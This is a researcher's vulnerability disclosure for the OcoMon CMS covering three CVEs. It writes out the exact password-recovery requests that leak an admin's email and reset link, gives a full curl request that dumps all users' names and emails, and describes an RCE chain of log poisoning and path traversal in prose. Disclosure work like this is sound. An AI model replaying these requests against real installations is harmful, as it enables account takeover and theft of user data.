OcoMon Ownage: Hacking into a Brazilian CMS

Introduction

OcoMon is an open-source Content Management System (CMS) developed in Brazil, widely used by private companies, governmental bodies, and universities for operational control. Given its extensive adoption and the critical nature of the operations it manages, ensuring its security is paramount.

Motivated by this need and the potential risks involved, my colleague Fabricio Gimenes (@donotouchplease) and I decided to delve into OcoMon’s code. Our goal was straightforward: to identify and rectify any vulnerabilities or bugs, thereby strengthening the application’s security.

Methodology

To conduct the code analysis, I downloaded the latest version of OcoMon.

Additionally, I initiated OcoMon on a Docker service, adhering to the guidelines provided in the documentation: https://sourceforge.net/projects/ocomonphp/files/OcoMon_4.0/.

docker run -it --name ocomon_4 -p 8000:80 flaviorib/ocomon_demo-4.0:20211021 /bin/ocomon

This approach allowed me to thoroughly inspect the application in a controlled environment, facilitating a comprehensive examination of its functionalities and security aspects.

Findings

• CVE-2022-40798 - Account Takeover affecting versions < 4.0RC1
• CVE-2023-33558 - User enumeration affecting versions < 4.0.1
• CVE-2023-33559 - File Inclusion allow Remote Code Execution affecting versions < 4.0.1

Account Takeover

The vulnerability in question was dissected into two distinct bugs, both contributing to the overarching security flaw.

The first bug is also encountered within the password recovery mechanism. When a user attempts to recover their password by inputting a valid username along with an invalid email, the application erroneously reveals the correct email address associated with that username in its response message.

By sending a request to the URL:

https://ocomon.site/includes/common/require_access_recovery_process.php

With the data:

csrf=&csrf_session_key=csrf_token&login_name=admin&email=anything@email.com&action=require_recovery

The actual user’s email is revealed in the response under the mail_to parameter.

The second bug emerges when the correct combination of username and email is provided for password recovery. In a typical scenario, one would expect the password reset link to be securely sent to the user’s email. However, due to this vulnerability, the link is instead included directly in the response to the request.

Sending a request to the URL:

https://ocomon.site/includes/common/require_access_recovery_process.php

With the data:

csrf=&csrf_session_key=csrf_token&login_name=admin&email=real-email@email.com&action=require_recovery

Results in the response containing the link to reset the user’s password, potentially enabling Account Takeover.

Simply taking the link received in the request response and opening it in a browser will allow for the user’s password to be changed.

User Enumeration

The vulnerability arises because the users-grid-data.php file fails to validate authentication/session.

Since there is no session/authentication validation on this endpoint, it is possible to make a request and obtain the username and email of all users.

$ curl -i -s -k -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF -Mode: cors' --data-binary 'draw=1&columns%5B0%5D%5Bdata%5D=0&columns%5B0%5D%5Bname%5D=&columns%5B0%5D%5Bsearchable%5D=true&columns%5B0%5D%5Borderable%5D=true&columns%5B0%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B0%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B1%5D%5Bdata%5D=1&columns%5B1%5D%5Bname%5D=&columns%5B1%5D%5Bsearchable%5D=true&columns%5B1%5D%5Borderable%5D=true&columns%5B1%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B1%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B2%5D%5Bdata%5D=2&columns%5B2%5D%5Bname%5D=&columns%5B2%5D%5Bsearchable%5D=true&columns%5B2%5D%5Borderable%5D=true&columns%5B2%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B2%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B3%5D%5Bdata%5D=3&columns%5B3%5D%5Bname%5D=&columns%5B3%5D%5Bsearchable%5D=true&columns%5B3%5D%5Borderable%5D=true&columns%5B3%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B3%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B4%5D%5Bdata%5D=4&columns%5B4%5D%5Bname%5D=&columns%5B4%5D%5Bsearchable%5D=true&columns%5B4%5D%5Borderable%5D=true&columns%5B4%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B4%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B5%5D%5Bdata%5D=5&columns%5B5%5D%5Bname%5D=&columns%5B5%5D%5Bsearchable%5D=true&columns%5B5%5D%5Borderable%5D=true&columns%5B5%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B5%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B6%5D%5Bdata%5D=6&columns%5B6%5D%5Bname%5D=&columns%5B6%5D%5Bsearchable%5D=true&columns%5B6%5D%5Borderable%5D=true&columns%5B6%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B6%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B7%5D%5Bdata%5D=7&columns%5B7%5D%5Bname%5D=&columns%5B7%5D%5Bsearchable%5D=false&columns%5B7%5D%5Borderable%5D=false&columns%5B7%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B7%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B8%5D%5Bdata%5D=8&columns%5B8%5D%5Bname%5D=&columns%5B8%5D%5Bsearchable%5D=false&columns%5B8%5D%5Borderable%5D=false&columns%5B8%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B8%5D%5Bsearch%5D%5Bregex%5D=false&order%5B0%5D%5Bcolumn%5D=0&order%5B0%5D%5Bdir%5D=asc&start=0&length=10&search%5Bvalue%5D=&search%5Bregex%5D=false&areaAdmin=0' 'https://ocomon/admin/geral/users-grid-data.php'

File Inclusion allow Remote Code Execution

The vulnerability occurs because the TRANS function uses the PHP include function to incorporate the language file, and there is no sanitization/validation of the user’s input data.

To achieve Remote Code Execution, I employed a technique known as Log Poisoning, which allows the insertion of malicious PHP code into the web server’s log.

Initially, I injected malicious code into the Apache2 access log.

After inserting the code, I changed the user’s language setting and in the lang parameter, I used another technique known as Path Traversal to read the Apache2 log file.

Upon sending the request, when a user accesses the OcoMon application, the server attempts to load the file /var/log/apache2/access.log using the include function and executes the malicious PHP code, ultimately achieving RCE.

Notes

For those utilizing the OcoMon CMS, it is strongly recommended to update to the latest version available on the official OcoMon website at https://ocomon.com.br. Keeping your software up-to-date is crucial for ensuring the security and stability of your system, as each new release often includes patches for vulnerabilities along with enhancements and new features.

Special thanks to Flávio Ribeiro (@flaviorib)

Resources

• https://ocomon.com.br/site/
• https://www.docker.com
• https://www.php.net/manual/en/function.include.php
• https://owasp.org/www-community/attacks/Log_Injection
• https://owasp.org/www-community/attacks/Path_Traversal